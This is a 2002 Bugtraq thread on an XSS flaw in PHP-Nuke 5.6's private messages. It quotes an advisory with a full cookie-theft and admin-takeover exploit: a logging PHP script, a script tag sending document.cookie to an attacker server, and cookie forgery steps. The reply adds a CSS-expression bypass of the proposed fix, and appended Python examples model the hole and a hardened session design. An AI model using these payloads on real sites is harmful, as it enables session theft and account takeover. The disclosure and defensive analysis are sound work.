Re: PHP-Nuke v5.6 - Users can compromise admin accts.
From: Jelmer (jelmer@kuperus.xs4all.nl) Date: 08/16/02
- In reply to: <-delusion->: "PHP-Nuke v5.6 - Users can compromise admin accts."
- Next in thread: <-delusion->: "Re: PHP-Nuke v5.6 - Users can compromise admin accts."
From: "Jelmer" <jelmer@kuperus.xs4all.nl>
To: "<-delusion->" <delusi0n@bellsouth.net>, <bugtraq@securityfocus.com>, <webappsec@secuirtyfocus.com>
Date: Fri, 16 Aug 2002 01:08:17 +0200
IMHO this whole email is just stating the obvious. On top of that the
proposed fix is flawed.
The PHP strip_tags function does not strip attributes, so this is possible in
your proposed fix:
<a done=false STYLE="visibility : hidden; word-spacing : expression(
!(eval(this.done)) ? location.href='http://kuperus.xs4all.nl' : 0 );
word-wrap : expression(this.done=true);"> test</a>
It's a bit messy but gets the job done. It works by using CSS expressions (a
feature AFAIK native to Internet Explorer) in the style tag.
-- jelmer

----- Original Message -----
From: "<-delusion->" <delusi0n@bellsouth.net>
To: <bugtraq@securityfocus.com>; <webappsec@secuirtyfocus.com>
Sent: Thursday, August 15, 2002 10:30 AM
Subject: PHP-Nuke v5.6 - Users can compromise admin accts.
> Tested on PHP-Nuke v5.6 with Mozilla on Linux
> (should work on past versions and on most browsers)
>
> Impact:
> ---------------------------------------------
> Allows any user to get admin access to a PHP-Nuke site.
>
> Summary:
> ----------------------------------------------
> Due to a XSS flaw in PHPNuke's Private Messaging module, users can send
> messages with html code that will be executed without any filtering. In old
> PHPNuke versions XSS allowed theft of cookies which stored passwords in
> base64 encoding. Well PHPNuke version 5.6 encrypts the passwds in md5 before
> it encodes it into base64 and puts it into a cookie. This made stolen
> cookies useless if the attacker just tried decoding the base64 encrypted
> pass, because he just got the MD5 encrypted pass.
>
> Since PHP Nuke encrypts passes in md5 and then matches the encrypted pass
> with the encrypted one in the database, I was able to use the md5 encrypted
> pass I got from the stolen cookie to authenticate myself.
>
> PHPNuke sets cookies by base64 encoding a string that looks like this:
>
> username:md5_encrypted_pass:lang
>
> Since I can get the md5_encrypted pass all I have to do is launch a script
> that base64 encodes a string like the one above, and sets it as a cookie on
> my box.
>
> Exploit:
> -------------------------------------------------
> For this exploit to work, you must create the following files in your web
> server's directory.
>
> cookie.php containing this:
> <?
> $fp = fopen("cookie.txt","a");
> fputs($fp, $cookie);
> fclose($fp);
> print "Message Not Found!"; /* this is so the admin doesn't get scared and
> thinks it's some bug. */
> ?>
>
> test.php containing:
> <?
> $admin = base64_encode("decoded_string") ;
> setcookie("admin","$admin",time()+2592000);
> ?>
> You will find out what to replace decoded_string with..
>
> 1. Send an appealing private message to admin containing
> <script>document.location.replace('http://yourserver/cookie.php?cookie='+document.cookie);</script>
>
> 2. Wait awhile until the admin checks the message, then check cookie.txt on
> your server.
>
> 3. From cookie.txt, copy the encrypted text after admin= and before the ;
>
> 4. Go to http://www.isecurelabs.com/base64.php, paste the copied text, click
> decode; it should give you a string like this:
> username:md5_encrypted_passwd:language (language may be blank).
>
> 5. Paste the decoded string into test.php like so.
> <?
> $admin = base64_encode("paste decoded string here");
> setcookie("admin","$admin",time()+2592000);
> ?>
>
> 6. Login as any user on the site
>
> 7. Send private message to self containing:
> <iframe src="http://yerserver/test.php"></iframe>
> Open the message and a cookie will now be set on your box, but it will be
> configured with your server's URL. So all you gotta do is replace your url
> with the nuked site.
>
> 8. For Mozilla, edit cookies.txt in your ~/.mozilla/someprofile/something/
> directory and replace the url of your server with the nuked site; for other
> browsers just find the Cookie from your server and edit it so instead of
> showing your url it shows the url of the nuked site.
>
> 9. Restart your browser (close and open up again). Go back into the nuked
> site and you are now admin. :D
>
> Temp Solution:
> -------------------------------------------------
> Edit reply.php in /modules/Private_Messages/ and make $message be stripped
> of html tags.
>
> Go to line 75 in reply.php and add this line:
>
> $message = strip_tags($message, '<br><b><u><i>');
>
> That will remove any html tags that aren't <br><b><u> or <i>. So it will
> prevent the XSS.
> -------------------------------------------------
> NOTE: I wasn't able to contact the php nuke person, I couldn't find an email
> on their site, and when I signed up for membership I never got the password,
> so if you can, let them know asap so they can fix this.
>
> Another Vulnerability Brought to you by,
> delusion
> http://digital-delusions.dyn.ee
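The hole in the quoted temporary fix, as an added example that is not from this thread or from PHP-Nuke's code: a Python model of strip_tags() with an allowlist, which copies allowed tags verbatim (the PHP manual itself warns that strip_tags does not modify attributes on the tags you allow), beside a filter that rebuilds allowed tags bare. The message is constructed: it carries the CSS-expression trick from the reply on <b>, a tag the quoted allowlist keeps, and attacker.example is a placeholder host.

```python
"""Tag allowlisting with and without attribute stripping (added example)."""
import html
import re
from html.parser import HTMLParser

# Allowlist taken from the temporary fix quoted above:
#   strip_tags($message, '<br><b><u><i>')
ALLOWED_TAGS = {"br", "b", "u", "i"}

# Constructed message: the CSS-expression trick from the reply, carried by <b>
# so the allowlist keeps the tag. attacker.example is a placeholder host.
MESSAGE = (
    'hi <b STYLE="visibility: hidden; word-spacing: '
    "expression(location.href='http://attacker.example/')\">admin</b>"
    " &lt;not a tag&gt;"
)


class _AllowlistFilter(HTMLParser):
    """Re-serialise input keeping only allowlisted tags.

    keep_attrs=True models PHP's strip_tags($s, $allowed): an allowed tag is
    copied verbatim, attributes and all, which is the hole the reply points
    out. keep_attrs=False emits bare <tag>/</tag> only and escapes text.
    Comments, declarations and processing instructions are dropped either way.
    """

    def __init__(self, keep_attrs):
        super().__init__(convert_charrefs=False)
        self.keep_attrs = keep_attrs
        self.out = []

    def _open(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(self.get_starttag_text() if self.keep_attrs else f"<{tag}>")

    def handle_starttag(self, tag, attrs):
        self._open(tag)

    def handle_startendtag(self, tag, attrs):
        self._open(tag)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data if self.keep_attrs else html.escape(data, quote=False))

    def handle_entityref(self, name):
        self.out.append(f"&{name};")  # pass existing entities through untouched

    def handle_charref(self, name):
        self.out.append(f"&#{name};")


def _run(text, keep_attrs):
    parser = _AllowlistFilter(keep_attrs)
    parser.feed(text)
    parser.close()
    return "".join(parser.out)


def strip_tags_php_style(text):
    """Model of strip_tags() with an allowlist: attributes on kept tags survive."""
    return _run(text, keep_attrs=True)


def strip_tags_and_attributes(text):
    """Allowlisted tags rebuilt without any attribute; text nodes escaped."""
    return _run(text, keep_attrs=False)


def has_active_attribute(markup):
    """Cheap detector for the vectors at issue: style= and on*= attributes,
    CSS expression() and javascript: URLs left inside the output."""
    return re.search(r"(?i)\b(style|on\w+)\s*=|expression\s*\(|javascript:", markup) is not None


if __name__ == "__main__":
    lax = strip_tags_php_style(MESSAGE)
    strict = strip_tags_and_attributes(MESSAGE)
    print("strip_tags-style :", lax, "| active vector:", has_active_attribute(lax))
    print("bare tags only   :", strict, "| active vector:", has_active_attribute(strict))
```

The bare-tag rebuild closes this hole not by recognising style= but by keeping no attribute at all, so on* handlers and javascript: URLs on an allowed tag go the same way; text nodes are escaped on output so a stray `<` in the message cannot start a tag later.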
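The cookie mechanics the quoted post describes, as an added example in Python that is not PHP-Nuke code: the base64("username:md5pass:lang") cookie, the check that compares the md5 from the cookie straight against the stored md5 (so the stolen hash is the credential and never has to be reversed), the forgery of steps 3 to 5, and a hardened variant that issues an opaque server-side session id after one password check. The user table and password are constructed; md5 appears only to model the 5.6 storage format the post describes.

```python
"""PHP-Nuke 5.6-style cookie replay versus an opaque session id (added example)."""
import base64
import hashlib
import hmac
import secrets

# Constructed user table. PHP-Nuke 5.6 stored md5(password) per the post above;
# md5 is used here only to model that code, not as a recommendation.
USERS = {"admin": hashlib.md5(b"correct horse", usedforsecurity=False).hexdigest()}


def nuke_cookie(username, password_md5, lang=""):
    """Cookie as the post describes it: base64("username:md5pass:lang")."""
    return base64.b64encode(f"{username}:{password_md5}:{lang}".encode()).decode()


def nuke_check(cookie):
    """Model of the login check the post describes: the md5 carried in the
    cookie is compared directly with the stored md5. Returns the username on
    success, None otherwise. The plaintext password is never needed."""
    try:
        user, pw_md5, _lang = base64.b64decode(cookie, validate=True).decode().split(":", 2)
    except (ValueError, UnicodeDecodeError):
        return None
    stored = USERS.get(user)
    if stored is not None and hmac.compare_digest(stored, pw_md5):
        return user
    return None


def forge_from_stolen(cookie, lang="xx"):
    """What steps 3 to 5 of the post do by hand: decode the stolen cookie, keep
    the md5, rebuild a cookie. The lang field can be anything."""
    user, pw_md5, _lang = base64.b64decode(cookie).decode().split(":", 2)
    return nuke_cookie(user, pw_md5, lang)


# Hardened variant: check the password once, then hand out an opaque random
# session id kept server-side. Nothing password-derived leaves the server, so
# an exposed cookie is a revocable session rather than a reusable credential.
SESSIONS = {}


def login(username, password):
    stored = USERS.get(username)
    candidate = hashlib.md5(password.encode(), usedforsecurity=False).hexdigest()
    if stored is None or not hmac.compare_digest(stored, candidate):
        return None
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = username
    return sid


def session_check(sid):
    return SESSIONS.get(sid)


def logout(sid):
    """Revocation, which a password-equivalent cookie cannot offer short of a
    password change."""
    return SESSIONS.pop(sid, None) is not None


if __name__ == "__main__":
    stolen = nuke_cookie("admin", USERS["admin"])  # what cookie.txt would hold
    print("stolen cookie authenticates as:", nuke_check(stolen))
    print("forged cookie authenticates as:", nuke_check(forge_from_stolen(stolen)))
    sid = login("admin", "correct horse")
    print("session id authenticates as:", session_check(sid))
    logout(sid)
    print("after logout:", session_check(sid))
```

The hardened variant does not remove the need to fix the XSS: a stolen session id still hijacks that session for its lifetime. The difference is that the cookie carries nothing password-derived and can be revoked, so it cannot be turned into a permanent credential the way the replayed md5 is.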